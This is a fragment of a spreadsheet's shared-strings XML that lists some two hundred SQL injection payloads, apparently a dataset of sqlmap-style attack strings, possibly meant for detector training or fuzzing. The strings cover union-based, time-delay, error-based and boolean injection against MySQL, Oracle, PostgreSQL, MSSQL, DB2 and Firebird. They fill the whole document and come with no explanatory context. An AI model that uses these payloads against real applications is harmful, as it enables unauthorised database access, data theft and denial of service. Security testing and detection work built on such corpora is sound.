    <t>1" )  where 1870 = 1870 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "%" = "</t>
  </si>
  <si>
    <t>1" )  where 6823 = 6823 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1" where 2131 = 2131 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) #</t>
  </si>
  <si>
    <t>1" where 2403 = 2403 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6984 order by 1#</t>
  </si>
  <si>
    <t>-8144' )  where 1691 = 1691 or elt ( 7246 = 7816,7816 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'jscc' from dual where 3266 = 3266 and elt ( 4249 = 4249,7259  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">-8828%'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1%'  )  )   and sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "dacx" = "dacx</t>
  </si>
  <si>
    <t>-1148"  )  )   union all select 5442,5442,5442,5442#</t>
  </si>
  <si>
    <t>1" )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( "ngnd" like "ngnd</t>
  </si>
  <si>
    <t>1"  )  )   as whyr where 9731 = 9731 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>-2504'  )  )   )  or 8723 = 9715</t>
  </si>
  <si>
    <t>1' where 9708 = 9708 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'pyga' from dual where 8501 = 8501 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 5215 = 5215</t>
  </si>
  <si>
    <t>1 )  as lvfu where 5831 = 5831 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1"  )  )   as nsbu where 6569 = 6569 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-2361'  )  )   as mzhv where 2905 = 2905 or 9026 = 5388--</t>
  </si>
  <si>
    <t>-1602' or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  where 5850 = 5850 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) </t>
  </si>
  <si>
    <t>select case when 3819 = 1887 then 1 else null end--</t>
  </si>
  <si>
    <t>1" )  as nyzd where 5305 = 5305</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 'gbhd' = 'gbhd</t>
  </si>
  <si>
    <t>1"  )  )   as exzo where 7518 = 7518  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 8674 = 7896 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>-4286%"  )  )   )  union all select 2229,2229,2229,2229,2229,2229#</t>
  </si>
  <si>
    <t>1' )  as asjj where 1721 = 1721 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>1' in boolean mode )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'dujx' where 6896 = 6896 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-2067" or 3038 = 3038</t>
  </si>
  <si>
    <t>1 )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 4003 = 4003</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 3504 = 3504</t>
  </si>
  <si>
    <t>1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'hgwt' like 'hgwt</t>
  </si>
  <si>
    <t>1%' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   as qode where 2398 = 2398 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as lrnh where 8569 = 8569 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  and elt ( 1407 = 6365,6365 )  and  ( 'zckl' = 'zckl</t>
  </si>
  <si>
    <t xml:space="preserve">-6179  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  </t>
  </si>
  <si>
    <t>1  )  )   union all select null--</t>
  </si>
  <si>
    <t>1'|| ( select 'fcnb' where 2869 = 2869 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>1%"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" where 4082 = 4082 and elt ( 5699 = 1432,1432 ) --</t>
  </si>
  <si>
    <t>-4005' where 3963 = 3963 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1 where 6434 = 6434</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'yfvu' like 'yfvu</t>
  </si>
  <si>
    <t>-4865 where 1386 = 1386 union all select 1386,1386,1386,1386#</t>
  </si>
  <si>
    <t>select * from generate_series ( 3827,3827,case when  ( 3827 = 7095 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) #</t>
  </si>
  <si>
    <t>-5861' )  or 1581 = 2611 and  ( 'mvjh' like 'mvjh</t>
  </si>
  <si>
    <t>1 where 2672 = 2672 and 1819 = 4322#</t>
  </si>
  <si>
    <t>1' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1166'  )  )   as icdz where 1042 = 1042 union all select 1042,1042,1042,1042,1042#</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'fgox' like 'fgox</t>
  </si>
  <si>
    <t>1' )  as nftr where 8825 = 8825 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 )  as udjn where 6871 = 6871 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 1844 = 1844</t>
  </si>
  <si>
    <t>1'|| ( select 'bupa' from dual where 8548 = 8548</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) </t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  as boeh where 2571 = 2571 union all select null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>1" )  as cxwd where 5800 = 5800 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 9030 = 9185 )  then 9030 else 9030* ( select 9030 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%" )  waitfor delay '0:0:5' and  ( "%" = "</t>
  </si>
  <si>
    <t>-2583" )  where 3455 = 3455 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 1002 = 3556,3556 )  and   (  (  'mfao' = 'mfao</t>
  </si>
  <si>
    <t>-5210" )  where 7176 = 7176 or 6872 = 6872--</t>
  </si>
  <si>
    <t>1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "bnyh" = "bnyh</t>
  </si>
  <si>
    <t>1' where 6583 = 6583</t>
  </si>
  <si>
    <t>1" )  as uyms where 6210 = 6210 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1 )  where 2468 = 2468 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1  )  )   as wmxa where 6485 = 6485 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-2303'  )  )   as exyt where 2528 = 2528 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-9136' )  or make_set ( 9354 = 9354,7185 ) </t>
  </si>
  <si>
    <t>1  )  )   as aqpy where 4027 = 4027 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>1'  )  )   as hpta where 5376 = 5376 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1 where 5828 = 5828 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>-4205' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>-8023' in boolean mode )  order by 1#</t>
  </si>
  <si>
    <t>1"  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "gcyp" like "gcyp</t>
  </si>
  <si>
    <t>1"  )  )   as jmoy where 9676 = 9676 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  as pqle where 4039 = 4039 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1' )  as xrap where 5523 = 5523 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1,extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 9788 = 9788,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1' and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) #</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'ywxc' = 'ywxc</t>
  </si>
  <si>
    <t>1" )  as hsws where 6656 = 6656</t>
  </si>
  <si>
    <t>select  ( case when  ( 8233 = 1074 )  then 8233 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1" )  as nfpe where 2679 = 2679</t>
  </si>
  <si>
    <t>1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "oyou" = "oyou</t>
  </si>
  <si>
    <t>-6109 union all select 6784--</t>
  </si>
  <si>
    <t>1 )  as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  as yuqv where 6007 = 6007 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select ugvj where 2593 = 2593 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'xwbo' from dual where 1263 = 1263 waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>1  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 8018 = 8018</t>
  </si>
  <si>
    <t>-6636'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'kgip' = 'kgip</t>
  </si>
  <si>
    <t>1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "xyjg" = "xyjg</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2976 = 2976,1,1/0 ) </t>
  </si>
  <si>
    <t>-9676 or elt ( 1032 = 1032,3623 ) # jcaq</t>
  </si>
  <si>
    <t>-6253' union all select 5756,5756,5756,5756,5756,5756,5756,5756,5756,5756#</t>
  </si>
  <si>
    <t>-1583' )  or elt ( 1032 = 1032,3623 )  and  ( 'jrcj' like 'jrcj</t>
  </si>
  <si>
    <t>1 )  as qeav where 8127 = 8127 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' where 9994 = 9994 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 )  where 1559 = 1559 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1 )  as hywx where 1424 = 1424 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'fpnz' where 1592 = 1592 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   as owcw where 1107 = 1107 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  where 3703 = 3703 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  "rthl" like "rthl</t>
  </si>
  <si>
    <t>1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "mzhk" = "mzhk</t>
  </si>
  <si>
    <t xml:space="preserve">-1678" where 3706 = 3706 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr </t>
  </si>
  <si>
    <t>1%' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'flbv' where 7451 = 7451 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1 where 1636 = 1636 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 8642 = 6049 )  then 1 else 8642* ( select 8642 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-2982' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t xml:space="preserve">-9987  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "hvwv" = "hvwv</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5' and 'dtej' like 'dtej</t>
  </si>
  <si>
    <t>1"  )  )   as jgie where 8017 = 8017 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'cogf' like 'cogf</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "sajl" = "sajl</t>
  </si>
  <si>
    <t>1' and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-5934' union all select 6096,6096,6096,6096,6096#</t>
  </si>
  <si>
    <t>1' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'ptou' = 'ptou</t>
  </si>
  <si>
    <t>1 )  and make_set ( 8403 = 8403,8899 )  and  ( 9761 = 9761</t>
  </si>
  <si>
    <t>1 )  where 6090 = 6090</t>
  </si>
  <si>
    <t>-1559 union all select 3985,3985,3985,3985#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">-8550" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t>1'|| ( select 'ysij' from dual where 6140 = 6140 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  ||'</t>
  </si>
  <si>
    <t>-6095"  )  )   as kgfp where 3601 = 3601 or 7287 = 9373#</t>
  </si>
  <si>
    <t>1'+ ( select 'ggkm' where 3394 = 3394</t>
  </si>
  <si>
    <t>1%"  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5657'  )  )   )  union all select 8071,8071,8071,8071,8071,8071,8071,8071#</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "qcqx" like "qcqx</t>
  </si>
  <si>
    <t>1'+ ( select xwcl where 7997 = 7997</t>
  </si>
  <si>
    <t>-4713'  )  )   )  or 4567 = 1287</t>
  </si>
  <si>
    <t>1'+ ( select 'gmpn' where 8137 = 8137 or sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>1 )  and 5196 = 9002</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2384%'  )  )   union all select 2467,2467,2467,2467#</t>
  </si>
  <si>
    <t>1'+ ( select 'upmd' where 3438 = 3438</t>
  </si>
  <si>
    <t>1'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and 'nwdk' like 'nwdk</t>
  </si>
  <si>
    <t>1" where 9632 = 9632 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' )  where 4003 = 4003</t>
  </si>
  <si>
    <t>1%'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">-4945 or make_set ( 9354 = 9354,7185 ) </t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>1 )  as zhvx where 3171 = 3171 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'qbdh' where 4006 = 4006 and 7533 = 7533 ) +'</t>
  </si>
  <si>
    <t>1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'lfhx' = 'lfhx</t>
  </si>
  <si>
    <t>1" and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
